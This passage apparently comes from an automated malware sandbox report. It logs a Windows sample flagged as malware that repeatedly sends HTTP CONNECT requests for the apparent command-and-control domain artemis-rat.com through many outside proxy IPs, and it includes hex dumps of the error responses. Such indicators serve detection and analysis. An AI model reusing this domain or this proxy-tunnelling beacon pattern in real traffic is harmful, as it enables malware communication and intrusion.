                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.1</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              159192.168.2.450454104.18.103.125807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.712821960 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:17.866812944 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:17 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              160192.168.2.44973872.169.67.85877284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.715939045 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              161192.168.2.45040492.204.134.38256757284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.741024017 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:18.288027048 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.006803036 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:20.554092884 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.497095108 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              162192.168.2.45039565.169.38.73265927284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.741245985 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              163192.168.2.450345123.110.158.236807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.741892099 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:18.413103104 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              164192.168.2.45034831.220.78.244807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.742692947 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:18.413031101 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:09.819761038 CET536INHTTP/1.1 500 Internal Server Error
                                              Date: Mon, 11 Mar 2024 07:38:09 GMT
                                              Server: Apache/2.4.52 (Ubuntu)
                                              Content-Length: 613
                                              Connection: close
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 5b 6e 6f 20 61 64 64 72 65 73 73 20 67 69 76 65 6e 5d 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at [no address given] to inform them of
                                              Mar 11, 2024 08:38:09.819835901 CET269INData Raw: 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f
                                              Data Ascii: the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at artemis-rat.com Port 443


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              165192.168.2.450445142.54.226.21441457284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.742918015 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              166192.168.2.450509185.238.228.67807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.778326035 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:17.932985067 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:17 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              167192.168.2.45033180.92.227.18556787284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.778466940 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              168192.168.2.45044845.196.148.6754327284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.779398918 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:17.996494055 CET308INHTTP/1.1 407 Proxy Authentication Required
                                              Server: FaaS v1.3-20220203-7fa38bd5af
                                              Date: Mon, 11 Mar 2024 07:37:17 GMT
                                              Content-Type: text/plain; charset=utf-8
                                              Content-Length: 65
                                              Proxy-Authenticate: Basic realm="Proxy"
                                              Connection: close
                                              Data Raw: 48 54 54 50 20 61 75 74 68 6f 72 69 7a 61 74 69 6f 6e 20 65 72 72 6f 72 3a 20 69 70 20 61 75 74 68 20 66 61 69 6c 65 64 2c 20 6e 6f 20 63 72 65 64 65 6e 74 69 61 6c 73 20 70 72 6f 76 69 64 65 64
                                              Data Ascii: HTTP authorization error: ip auth failed, no credentials provided


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              169192.168.2.45034694.131.14.6610817284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.779525995 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              170192.168.2.450511172.67.162.127807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.779597998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:17.933929920 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:17 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              171192.168.2.450452209.142.64.219397897284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.780013084 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:18.303697109 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:18.975634098 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:20.366528034 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.054385900 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:25.732101917 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:28.554141998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:33.866466045 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:44.569406986 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              172192.168.2.45046238.162.27.18131287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.780410051 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:20.192485094 CET111INHTTP/1.1 407 Proxy Authentication Required
                                              Proxy-Authenticate: Basic realm=""
                                              Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                              Data Ascii: Proxy Authentication Required


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              173192.168.2.450412170.239.205.39997284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.791332960 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:18.444294930 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.334949970 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.092314005 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.578219891 CET19INHTTP/1.1 200 OK


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              174192.168.2.450526172.67.182.126807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.793709040 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:17.950644970 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:17 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              175192.168.2.450500216.176.187.9988897284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.807032108 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:18.319267988 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:18.931011915 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:20.147453070 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.663330078 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:25.257252932 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:27.757348061 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:32.757097960 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:42.569365978 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              176192.168.2.450559185.162.230.178807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.811789036 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:17.966000080 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:17 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
